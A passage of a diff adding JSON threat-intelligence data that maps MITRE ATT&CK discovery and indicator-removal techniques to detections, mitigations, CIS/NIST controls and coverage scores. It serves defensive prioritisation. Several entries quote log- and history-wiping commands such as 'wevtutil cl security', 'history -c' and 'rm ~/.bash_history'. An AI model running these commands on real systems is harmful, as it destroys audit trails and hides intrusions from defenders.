+        "description": "Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n\nCommands such as net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility, dscl . -list /Groups on macOS, and groups on Linux can list local groups.",
+        "url": "https://attack.mitre.org/techniques/T1069/001",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1069",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.23809523809523808,
+        "adjusted_score": 0.23809523809523808,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1069.002",
+        "name": "Permission Groups Discovery: Domain Groups",
+        "description": "Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n\nCommands such as net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility,  dscacheutil -q group on macOS, and ldapsearch on Linux can list domain-level groups.",
+        "url": "https://attack.mitre.org/techniques/T1069/002",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1069",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.2571428571428571,
+        "adjusted_score": 0.2571428571428571,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1069.003",
+        "name": "Permission Groups Discovery: Cloud Groups",
+        "description": "Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.\n\nWith authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).\n\nAzure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google (Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation).\n\nAdversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.",
+        "url": "https://attack.mitre.org/techniques/T1069/003",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.",
+        "platforms": [
+            "Azure AD",
+            "Google Workspace",
+            "IaaS",
+            "Office 365",
+            "SaaS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "Command: Command Execution",
+            "Group: Group Enumeration",
+            "Group: Group Metadata",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1069",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.10476190476190476,
+        "adjusted_score": 0.10476190476190476,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1070",
+        "name": "Indicator Removal on Host",
+        "description": "Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1552/003) and /var/log/*.\n\nThese actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.",
+        "url": "https://attack.mitre.org/techniques/T1070",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "File system monitoring may be used to detect improper deletion or modification of indicator files.  Events not stored on the file system may require different detection mechanisms.",
+        "platforms": [
+            "Containers",
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Deletion",
+            "File: File Metadata",
+            "File: File Modification",
+            "Network Traffic: Network Traffic Content",
+            "Process: OS API Execution",
+            "Process: Process Creation",
+            "User Account: User Account Authentication",
+            "Windows Registry: Windows Registry Key Deletion",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1070.001",
+                "name": "Indicator Removal on Host: Clear Windows Event Logs",
+                "url": "https://attack.mitre.org/techniques/T1070/001",
+                "description": "Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.\n\nThe event logs can be cleared with the following utility commands:\n\n* wevtutil cl system\n* wevtutil cl application\n* wevtutil cl security\n\nThese logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+                "detection": "Deleting Windows event logs (via native binaries (Citation: Microsoft wevtutil Oct 2017), API functions (Citation: Microsoft EventLog.Clear), or [PowerShell](https://attack.mitre.org/techniques/T1059/001) (Citation: Microsoft Clear-EventLog)) may also generate an alterable event (Event ID 1102: \"The audit log was cleared\").",
+                "mitigations": [
+                    {
+                        "mid": "M1041",
+                        "name": "Encrypt Sensitive Information",
+                        "description": "Protect sensitive information with strong encryption.",
+                        "url": "https://attack.mitre.org/mitigations/M1041"
+                    },
+                    {
+                        "mid": "M1029",
+                        "name": "Remote Data Storage",
+                        "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.",
+                        "url": "https://attack.mitre.org/mitigations/M1029"
+                    },
+                    {
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    }
+                ]
+            },
+            {
+                "tid": "T1070.002",
+                "name": "Indicator Removal on Host: Clear Linux or Mac System Logs",
+                "url": "https://attack.mitre.org/techniques/T1070/002",
+                "description": "Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/ directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)\n\n* /var/log/messages:: General and system-related messages\n* /var/log/secure or /var/log/auth.log: Authentication logs\n* /var/log/utmp or /var/log/wtmp: Login records\n* /var/log/kern.log: Kernel logs\n* /var/log/cron.log: Crond logs\n* /var/log/maillog: Mail server logs\n* /var/log/httpd/: Web server access and error logs\n",
+                "detection": "File system monitoring may be used to detect improper deletion or modification of indicator files. Also monitor for suspicious processes interacting with log files.",
+                "mitigations": [
+                    {
+                        "mid": "M1041",
+                        "name": "Encrypt Sensitive Information",
+                        "description": "Protect sensitive information with strong encryption.",
+                        "url": "https://attack.mitre.org/mitigations/M1041"
+                    },
+                    {
+                        "mid": "M1029",
+                        "name": "Remote Data Storage",
+                        "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.",
+                        "url": "https://attack.mitre.org/mitigations/M1029"
+                    },
+                    {
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    }
+                ]
+            },
+            {
+                "tid": "T1070.003",
+                "name": "Indicator Removal on Host: Clear Command History",
+                "url": "https://attack.mitre.org/techniques/T1070/003",
+                "description": "In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.\n\nOn Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.\n\nAdversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history.\n\nOn Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.\n\nThe PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)\n\nAdversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)",
+                "detection": "User authentication, especially via remote terminal services like SSH, without new entries in that user's ~/.bash_history is suspicious. Additionally, the removal/clearing of the ~/.bash_history file can be an indicator of suspicious activity.\n\nMonitor for suspicious modifications or deletion of ConsoleHost_history.txt and use of the Clear-History command.",
+                "mitigations": [
+                    {
+                        "mid": "M1039",
+                        "name": "Environment Variable Permissions",
+                        "description": "Prevent modification of environment variables by unauthorized users and groups.",
+                        "url": "https://attack.mitre.org/mitigations/M1039"
+                    },
+                    {
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    }
+                ]
+            },
+            {
+                "tid": "T1070.004",
+                "name": "Indicator Removal on Host: File Deletion",
+                "url": "https://attack.mitre.org/techniques/T1070/004",
+                "description": "Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n\nThere are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)",
+                "detection": "It may be uncommon for events related to benign command-line functions such as DEL or third-party utilities or tools to be found in an environment, depending on the user base and how systems are typically used. Monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.",
+                "mitigations": []
+            },
+            {
+                "tid": "T1070.005",
+                "name": "Indicator Removal on Host: Network Share Connection Removal",
+                "url": "https://attack.mitre.org/techniques/T1070/005",
+                "description": "Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the net use \\\\system\\share /delete command. (Citation: Technet Net Use)",
+                "detection": "Network share connections may be common depending on how an network environment is used. Monitor command-line invocation of net use commands associated with establishing and removing remote shares over SMB, including following best practices for detection of [Windows Admin Shares](https://attack.mitre.org/techniques/T1077). SMB traffic between systems may also be captured and decoded to look for related network share session and file transfer activity. Windows authentication logs are also useful in determining when authenticated network shares are established and by which account, and can be used to correlate network share activity to other events to investigate potentially malicious activity.",
+                "mitigations": []
+            },
+            {
+                "tid": "T1070.006",
+                "name": "Indicator Removal on Host: Timestomp",
+                "url": "https://attack.mitre.org/techniques/T1070/006",
+                "description": "Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.\n\nTimestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)",
+                "detection": "Forensic techniques exist to detect aspects of files that have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques) It may be possible to detect timestomping using file modification monitoring that collects information on file handle opens and can compare timestamp values.",
+                "mitigations": []
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1041",
+                "name": "Encrypt Sensitive Information",
+                "description": "Protect sensitive information with strong encryption.",
+                "url": "https://attack.mitre.org/mitigations/M1041"
+            },
+            {
+                "mid": "M1029",
+                "name": "Remote Data Storage",
+                "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.",
+                "url": "https://attack.mitre.org/mitigations/M1029"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            }
+        ],
+        "cumulative_score": 1.2960555400000002,
+        "adjusted_score": 1.2960555400000002,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "3.1",
+            "3.11",
+            "3.12",
+            "3.3",
+            "3.4",
+            "4.1",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "8.1",
+            "8.2",
+            "8.3",
+            "8.9",
+            "12.8",
+            "3.10",
+            "8.10"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-17",
+            "AC-18",
+            "AC-19",
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CP-6",
+            "CP-7",
+            "CP-9",
+            "SC-36",
+            "SC-4",
+            "SI-12",
+            "SI-23",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.6000000000000001,
+            "mitigation_score": 0.6909090909090909,
+            "detection_score": 0.5
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.59605554
+    },
+    {
+        "tid": "T1070.001",
+        "name": "Indicator Removal on Host: Clear Windows Event Logs",
+        "description": "Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.\n\nThe event logs can be cleared with the following utility commands:\n\n* wevtutil cl system\n* wevtutil cl application\n* wevtutil cl security\n\nThese logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "url": "https://attack.mitre.org/techniques/T1070/001",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Deleting Windows event logs (via native binaries (Citation: Microsoft wevtutil Oct 2017), API functions (Citation: Microsoft EventLog.Clear), or [PowerShell](https://attack.mitre.org/techniques/T1059/001) (Citation: Microsoft Clear-EventLog)) may also generate an alterable event (Event ID 1102: \"The audit log was cleared\").",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: OS API Execution"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1070",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1041",
+                "name": "Encrypt Sensitive Information",
+                "description": "Protect sensitive information with strong encryption.",
+                "url": "https://attack.mitre.org/mitigations/M1041"
+            },
+            {
+                "mid": "M1029",
+                "name": "Remote Data Storage",
+                "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.",
+                "url": "https://attack.mitre.org/mitigations/M1029"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            }
+        ],
+        "cumulative_score": 0.5523809523809524,
+        "adjusted_score": 0.5523809523809524,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "3.1",
+            "3.11",
+            "3.12",
+            "3.3",
+            "3.4",
+            "4.1",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "8.1",
+            "8.2",
+            "8.3",
+            "8.9",
+            "12.8",
+            "3.10",
+            "8.10"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-17",
+            "AC-18",
+            "AC-19",
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CP-6",
+            "CP-7",
+            "CP-9",
+            "SC-36",
+            "SC-4",
+            "SI-12",
+            "SI-23",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1070.002",
+        "name": "Indicator Removal on Host: Clear Linux or Mac System Logs",
+        "description": "Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/ directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)\n\n* /var/log/messages:: General and system-related messages\n* /var/log/secure or /var/log/auth.log: Authentication logs\n* /var/log/utmp or /var/log/wtmp: Login records\n* /var/log/kern.log: Kernel logs\n* /var/log/cron.log: Crond logs\n* /var/log/maillog: Mail server logs\n* /var/log/httpd/: Web server access and error logs\n",
+        "url": "https://attack.mitre.org/techniques/T1070/002",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "File system monitoring may be used to detect improper deletion or modification of indicator files. Also monitor for suspicious processes interacting with log files.",
+        "platforms": [
+            "Linux",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Deletion",
+            "File: File Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1070",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1041",
+                "name": "Encrypt Sensitive Information",
+                "description": "Protect sensitive information with strong encryption.",
+                "url": "https://attack.mitre.org/mitigations/M1041"
+            },
+            {
+                "mid": "M1029",
+                "name": "Remote Data Storage",
+                "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.",
+                "url": "https://attack.mitre.org/mitigations/M1029"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            }
+        ],
+        "cumulative_score": 0.4714285714285714,
+        "adjusted_score": 0.4714285714285714,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "3.1",
+            "3.11",
+            "3.12",
+            "3.3",
+            "3.4",
+            "4.1",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "8.1",
+            "8.2",
+            "8.3",
+            "12.8",
+            "3.10",
+            "8.10"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-17",
+            "AC-18",
+            "AC-19",
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CP-6",
+            "CP-7",
+            "CP-9",
+            "SC-36",
+            "SC-4",
+            "SI-12",
+            "SI-23",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1070.003",
+        "name": "Indicator Removal on Host: Clear Command History",
+        "description": "In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.\n\nOn Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.\n\nAdversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history.\n\nOn Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.\n\nThe PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)\n\nAdversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)",
+        "url": "https://attack.mitre.org/techniques/T1070/003",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "User authentication, especially via remote terminal services like SSH, without new entries in that user's ~/.bash_history is suspicious. Additionally, the removal/clearing of the ~/.bash_history file can be an indicator of suspicious activity.\n\nMonitor for suspicious modifications or deletion of ConsoleHost_history.txt and use of the Clear-History command.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Deletion",
+            "File: File Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1070",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1039",
+                "name": "Environment Variable Permissions",
+                "description": "Prevent modification of environment variables by unauthorized users and groups.",
+                "url": "https://attack.mitre.org/mitigations/M1039"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            }
+        ],
+        "cumulative_score": 0.30000000000000004,
+        "adjusted_score": 0.30000000000000004,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "3.3",
+            "4.1",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1070.004",
+        "name": "Indicator Removal on Host: File Deletion",
+        "description": "Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n\nThere are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)",
+        "url": "https://attack.mitre.org/techniques/T1070/004",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "It may be uncommon for events related to benign command-line functions such as DEL or third-party utilities or tools to be found in an environment, depending on the user base and how systems are typically used. Monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Deletion"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1070",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.23333333333333334,
+        "adjusted_score": 0.23333333333333334,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1070.005",
+        "name": "Indicator Removal on Host: Network Share Connection Removal",
+        "description": "Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the net use \\\\system\\share /delete command. (Citation: Technet Net Use)",
+        "url": "https://attack.mitre.org/techniques/T1070/005",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Network share connections may be common depending on how an network environment is used. Monitor command-line invocation of net use commands associated with establishing and removing remote shares over SMB, including following best practices for detection of [Windows Admin Shares](https://attack.mitre.org/techniques/T1077). SMB traffic between systems may also be captured and decoded to look for related network share session and file transfer activity. Windows authentication logs are also useful in determining when authenticated network shares are established and by which account, and can be used to correlate network share activity to other events to investigate potentially malicious activity.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Network Traffic: Network Traffic Content",
+            "Process: Process Creation",
+            "User Account: User Account Authentication"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1070",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.12380952380952381,
+        "adjusted_score": 0.12380952380952381,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1070.006",
+        "name": "Indicator Removal on Host: Timestomp",
+        "description": "Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.\n\nTimestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)",
+        "url": "https://attack.mitre.org/techniques/T1070/006",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Forensic techniques exist to detect aspects of files that have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques) It may be possible to detect timestomping using file modification monitoring that collects information on file handle opens and can compare timestamp values.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "File: File Metadata",
+            "File: File Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1070",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.12857142857142856,
+        "adjusted_score": 0.12857142857142856,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1071",
+        "name": "Application Layer Protocol",
